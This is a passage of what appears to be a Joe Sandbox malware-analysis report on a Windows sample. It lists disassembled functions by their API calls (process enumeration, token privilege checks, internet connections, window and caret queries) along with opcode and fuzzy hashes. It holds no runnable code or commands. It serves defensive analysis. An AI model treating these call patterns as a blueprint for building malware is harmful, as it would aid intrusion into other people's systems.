                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                              • String ID:
                                                              • API String ID: 3058430110-0
                                                              • Opcode ID: a2432c6b1b074d564602c0f0b905af2abf42324e566fa6d0d905a7c3bad8de8e
                                                              • Instruction ID: c86574a2eff9f06b5aebb52d2eb8a4711dee90e14d3a1964d9fd43168b800dab
                                                              • Opcode Fuzzy Hash: a2432c6b1b074d564602c0f0b905af2abf42324e566fa6d0d905a7c3bad8de8e
                                                              • Instruction Fuzzy Hash: 72319E31A04246BFDF218F65CC44BAA7FA9BF82720F154029EC64D7191D771DA50E792
                                                              APIs
                                                              • GetForegroundWindow.USER32 ref: 00F94F02
                                                                • Part of subcall function 00F73641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F7365B
                                                                • Part of subcall function 00F73641: GetCurrentThreadId.KERNEL32 ref: 00F73662
                                                                • Part of subcall function 00F73641: AttachThreadInput.USER32(00000000,?,00F75005), ref: 00F73669
                                                              • GetCaretPos.USER32(?), ref: 00F94F13
                                                              • ClientToScreen.USER32(00000000,?), ref: 00F94F4E
                                                              • GetForegroundWindow.USER32 ref: 00F94F54
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                              • String ID:
                                                              • API String ID: 2759813231-0
                                                              • Opcode ID: e1eb0e43f6fba70b6b39cc3bff817e5e8fb26268d4874590852d18f1648214c6
                                                              • Instruction ID: 1174ebb2a8db1baba948000db88fa51a7f9b55b8c914cbec253ee94b1672e4c5
                                                              • Opcode Fuzzy Hash: e1eb0e43f6fba70b6b39cc3bff817e5e8fb26268d4874590852d18f1648214c6
                                                              • Instruction Fuzzy Hash: 7F312B72D00108AFDB00EFA5CD85DEFB7F9EF99304F10406AE415E7201EA75AE459BA1
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00F73C7A
                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00F73C88
                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00F73CA8
                                                              • CloseHandle.KERNEL32(00000000), ref: 00F73D52
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                              • String ID:
                                                              • API String ID: 420147892-0
                                                              • Opcode ID: 3b69a423397ca3160a87ff76f2e494a49e41a94c91967269ee5bc937017cc25c
                                                              • Instruction ID: 4a02193bf818b920f446b06e0eb933df61a1fd8acf01d6ed63c2e50a2ede7204
                                                              • Opcode Fuzzy Hash: 3b69a423397ca3160a87ff76f2e494a49e41a94c91967269ee5bc937017cc25c
                                                              • Instruction Fuzzy Hash: A83184311083099FD310EF50DC81AABBBE8EF95354F50482EF485861A1EB759A89EB93
                                                              APIs
                                                                • Part of subcall function 00F12612: GetWindowLongW.USER32(?,000000EB), ref: 00F12623
                                                              • GetCursorPos.USER32(?), ref: 00F9C4D2
                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00F4B9AB,?,?,?,?,?), ref: 00F9C4E7
                                                              • GetCursorPos.USER32(?), ref: 00F9C534
                                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00F4B9AB,?,?,?), ref: 00F9C56E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                              • String ID:
                                                              • API String ID: 2864067406-0
                                                              • Opcode ID: 4717f731b8d48d6d492fa146ccc53fc4141e2e6607df4eb057e9db66fbcb4a2c
                                                              • Instruction ID: 978f1a15a7585c5e0bd197fb49f87e6cfa1de705703941aa1e07fbf3d9a0836b
                                                              • Opcode Fuzzy Hash: 4717f731b8d48d6d492fa146ccc53fc4141e2e6607df4eb057e9db66fbcb4a2c
                                                              • Instruction Fuzzy Hash: 5131A235A00058AFDF15CF58C858EEA7BB6EB09720F49406AF9058B261C731AD50FBE4
                                                              APIs
                                                                • Part of subcall function 00F6810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F68121
                                                                • Part of subcall function 00F6810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F6812B
                                                                • Part of subcall function 00F6810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F6813A
                                                                • Part of subcall function 00F6810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F68141
                                                                • Part of subcall function 00F6810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F68157
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00F686A3
                                                              • _memcmp.LIBCMT ref: 00F686C6
                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F686FC
                                                              • HeapFree.KERNEL32(00000000), ref: 00F68703
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                              • String ID:
                                                              • API String ID: 1592001646-0
                                                              • Opcode ID: 9a8d7df1c7179df7475b8fc1ce2827032138418acd493f8de6875599c532bd04
                                                              • Instruction ID: 74045e508faba062b00002fabf6d5f44b557a01d9ecbd8809d578047e08c52c6
                                                              • Opcode Fuzzy Hash: 9a8d7df1c7179df7475b8fc1ce2827032138418acd493f8de6875599c532bd04
                                                              • Instruction Fuzzy Hash: 0121BD71E00108EFDB10DFA4C948BEEB7B9EF41354F14815DE404AB241DB32AE06EB90
                                                              APIs
                                                              • __setmode.LIBCMT ref: 00F309AE
                                                                • Part of subcall function 00F15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F77896,?,?,00000000), ref: 00F15A2C
                                                                • Part of subcall function 00F15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F77896,?,?,00000000,?,?), ref: 00F15A50
                                                              • _fprintf.LIBCMT ref: 00F309E5
                                                              • OutputDebugStringW.KERNEL32(?), ref: 00F65DBB
                                                                • Part of subcall function 00F34AAA: _flsall.LIBCMT ref: 00F34AC3
                                                              • __setmode.LIBCMT ref: 00F30A1A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                              • String ID:
                                                              • API String ID: 521402451-0
                                                              • Opcode ID: 6d7cda376733ed4244dce127fa47e17574fb92cb5b3fc3bad1197b3bfcfd0b33
                                                              • Instruction ID: 97f723f673e38d78f7e3b7d7da6a8837b2103c60ff05b8c57c406d7d763e15d9
                                                              • Opcode Fuzzy Hash: 6d7cda376733ed4244dce127fa47e17574fb92cb5b3fc3bad1197b3bfcfd0b33
                                                              • Instruction Fuzzy Hash: 25113A729082046FDB04B7B4AC479FE77689F81330F54001AF10567282EE7C698677E1
                                                              APIs
                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F817A3
                                                                • Part of subcall function 00F8182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F8184C
                                                                • Part of subcall function 00F8182D: InternetCloseHandle.WININET(00000000), ref: 00F818E9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Internet$CloseConnectHandleOpen
                                                              • String ID:
                                                              • API String ID: 1463438336-0
                                                              • Opcode ID: 552471f8b2cfd4bb95fdfbb82cf8cb3b843021ad7f6825ee51fa8a09097c0357
                                                              • Instruction ID: e4985a78233f9ad23f99e74a53d4eca227657dd5e39d63d923213627e95ece70
                                                              • Opcode Fuzzy Hash: 552471f8b2cfd4bb95fdfbb82cf8cb3b843021ad7f6825ee51fa8a09097c0357
                                                              • Instruction Fuzzy Hash: D621B032600605BBEB12AF609C01BFABBADFB48710F10412AF90196550D7719812B7A0
                                                              APIs
                                                              • GetFileAttributesW.KERNEL32(?,00F9FAC0), ref: 00F73A64
                                                              • GetLastError.KERNEL32 ref: 00F73A73
                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F73A82
                                                              • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00F9FAC0), ref: 00F73ADF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectory$AttributesErrorFileLast
                                                              • String ID:
                                                              • API String ID: 2267087916-0
                                                              • Opcode ID: fd93251899f3c307553bc23464876f9781908f2a9eec7e5510b4dd5e2e6fbba2
                                                              • Instruction ID: 98cabcfe8bc5577ea78a4ec365a005a8f32e183dd584efa3021dd8e1c4bf853d
                                                              • Opcode Fuzzy Hash: fd93251899f3c307553bc23464876f9781908f2a9eec7e5510b4dd5e2e6fbba2
                                                              • Instruction Fuzzy Hash: 3F21A635508306AF9700EF28C8829AA77E8AF55364F108A1EF49DC72A1D735DE49FB43
                                                              APIs
                                                                • Part of subcall function 00F6F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00F6DCD3,?,?,?,00F6EAC6,00000000,000000EF,00000119,?,?), ref: 00F6F0CB
                                                                • Part of subcall function 00F6F0BC: lstrcpyW.KERNEL32(00000000,?,?,00F6DCD3,?,?,?,00F6EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00F6F0F1
                                                                • Part of subcall function 00F6F0BC: lstrcmpiW.KERNEL32(00000000,?,00F6DCD3,?,?,?,00F6EAC6,00000000,000000EF,00000119,?,?), ref: 00F6F122
                                                              • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00F6EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00F6DCEC
                                                              • lstrcpyW.KERNEL32(00000000,?,?,00F6EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00F6DD12
                                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,00F6EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00F6DD46
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: lstrcmpilstrcpylstrlen
                                                              • String ID: cdecl
                                                              • API String ID: 4031866154-3896280584
                                                              • Opcode ID: f559f5420ee1782f47c326a09aed3aa3059ad9cb0a3a6e6397aea20feb83e158
                                                              • Instruction ID: ff4e64fd576e015ed14d3e3c2eb912001e35cd2eb83c98d7db6e1853d79780d7
                                                              • Opcode Fuzzy Hash: f559f5420ee1782f47c326a09aed3aa3059ad9cb0a3a6e6397aea20feb83e158
                                                              • Instruction Fuzzy Hash: D911D03A600305EBCB25AF34DC45D7A77A8FF46320B80802AF806CB2A0EB719850E7D1
                                                              APIs
                                                              • _free.LIBCMT ref: 00F45101
                                                                • Part of subcall function 00F3571C: __FF_MSGBANNER.LIBCMT ref: 00F35733
                                                                • Part of subcall function 00F3571C: __NMSG_WRITE.LIBCMT ref: 00F3573A
                                                                • Part of subcall function 00F3571C: RtlAllocateHeap.NTDLL(015D0000,00000000,00000001,00000000,?,?,?,00F30DD3,?), ref: 00F3575F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap_free
                                                              • String ID:
                                                              • API String ID: 614378929-0
                                                              • Opcode ID: 5966ba3f7ad19a389d62f2a66dd184456245147755926cea19c36939f950a758
                                                              • Instruction ID: 086479e069c90ba3fa76211a0a8afd6b1a8253582b892ccc7c5a5abd735db514
                                                              • Opcode Fuzzy Hash: 5966ba3f7ad19a389d62f2a66dd184456245147755926cea19c36939f950a758
                                                              • Instruction Fuzzy Hash: 3A11E372900A1AAFDB213F74AC45B6D3F989B84BB1F20452AFD049A162DE388941B690
                                                              APIs
                                                              • _memset.LIBCMT ref: 00F144CF
                                                                • Part of subcall function 00F1407C: _memset.LIBCMT ref: 00F140FC
                                                                • Part of subcall function 00F1407C: _wcscpy.LIBCMT ref: 00F14150
                                                                • Part of subcall function 00F1407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F14160
                                                              • KillTimer.USER32(?,00000001,?,?), ref: 00F14524
                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F14533
                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F4D4B9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                              • String ID:
                                                              • API String ID: 1378193009-0
                                                              • Opcode ID: fac819716cce27dfe8e5b18aa9ea9ca2f18c4fc9e0ce725979e5fcd459d54169
                                                              • Instruction ID: 8c185674aab5ec462728674e1f637cc4f6530938699410afc5d9623b102f3c75
                                                              • Opcode Fuzzy Hash: fac819716cce27dfe8e5b18aa9ea9ca2f18c4fc9e0ce725979e5fcd459d54169
                                                              • Instruction Fuzzy Hash: 7B2107719047849FE732CB24CC45BE6BFEC9F05315F08009EE68E96291C3742988EB41
                                                              APIs
                                                                • Part of subcall function 00F15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F77896,?,?,00000000), ref: 00F15A2C
                                                                • Part of subcall function 00F15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F77896,?,?,00000000,?,?), ref: 00F15A50
                                                              • gethostbyname.WSOCK32(?), ref: 00F86399
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00F863A4
                                                              • _memmove.LIBCMT ref: 00F863D1
                                                              • inet_ntoa.WSOCK32(?), ref: 00F863DC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                              • String ID:
                                                              • API String ID: 1504782959-0
                                                              • Opcode ID: b1be9cc5f3d9dc2d652c3e1c39d3462150bf521965de8a31b9093c82decffb55
                                                              • Instruction ID: e7bec63d2495b488ba3fe2661313e651bd3ac76ad8da87880f2f2c7556a75775
                                                              • Opcode Fuzzy Hash: b1be9cc5f3d9dc2d652c3e1c39d3462150bf521965de8a31b9093c82decffb55
                                                              • Instruction Fuzzy Hash: B2112131900109EFCB04FBA4DD56DEE77B8AF44310B544065F505E7161DB35DE58EBA1
                                                              APIs
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00F68B61
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F68B73
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F68B89
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F68BA4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 9c9406b00bde3dc537554dd55b1fff33d2d09344ed4060052189be4370fbe7fd
                                                              • Instruction ID: 260ed62a7b276d3cfae398461fb42a673fe6afeca8a4ee221d4b62122a7f67bb
                                                              • Opcode Fuzzy Hash: 9c9406b00bde3dc537554dd55b1fff33d2d09344ed4060052189be4370fbe7fd
                                                              • Instruction Fuzzy Hash: 6C114C79900218FFDB10DF95CC84F9DBB74FB48350F204195E900B7250DA716E11EB94
                                                              APIs
                                                                • Part of subcall function 00F12612: GetWindowLongW.USER32(?,000000EB), ref: 00F12623
                                                              • DefDlgProcW.USER32(?,00000020,?), ref: 00F112D8
                                                              • GetClientRect.USER32(?,?), ref: 00F4B5FB
                                                              • GetCursorPos.USER32(?), ref: 00F4B605
                                                              • ScreenToClient.USER32(?,?), ref: 00F4B610
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Client$CursorLongProcRectScreenWindow
                                                              • String ID:
                                                              • API String ID: 4127811313-0
                                                              • Opcode ID: 417d4b28c98fc56262c70b94548cf7e4a79111a78035ff6250f63450007efca0
                                                              • Instruction ID: dc3c4a9a2ef52589b6ea96d0f027f0c01c6849dcb5f4f30fe633e333aeca9203
                                                              • Opcode Fuzzy Hash: 417d4b28c98fc56262c70b94548cf7e4a79111a78035ff6250f63450007efca0
                                                              • Instruction Fuzzy Hash: 13113A36A0115DEFCF10EFA8D885AEE77B8FB05301F500456FA01E7241C734BA95ABA5
                                                              APIs
                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00F6FCED,?,00F70D40,?,00008000), ref: 00F7115F
                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00F6FCED,?,00F70D40,?,00008000), ref: 00F71184
                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00F6FCED,?,00F70D40,?,00008000), ref: 00F7118E
                                                              • Sleep.KERNEL32(?,?,?,?,?,?,?,00F6FCED,?,00F70D40,?,00008000), ref: 00F711C1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: CounterPerformanceQuerySleep
                                                              • String ID:
                                                              • API String ID: 2875609808-0
                                                              • Opcode ID: d2b170dd600109c18a786692dfcb5b5b4a9de83bf3a5eecc1c2b0bdd9269bb01
                                                              • Instruction ID: cf4abb52c8569a1801b455db9571cad7bb502a86073ed704c0ca5984b17d07c1
                                                              • Opcode Fuzzy Hash: d2b170dd600109c18a786692dfcb5b5b4a9de83bf3a5eecc1c2b0bdd9269bb01
                                                              • Instruction Fuzzy Hash: 53115E31C0051DD7CF009FA8D848AEEBB78FF09711F908056DA44B6240CBB05598EBD2
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00F6D84D
                                                              • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00F6D864
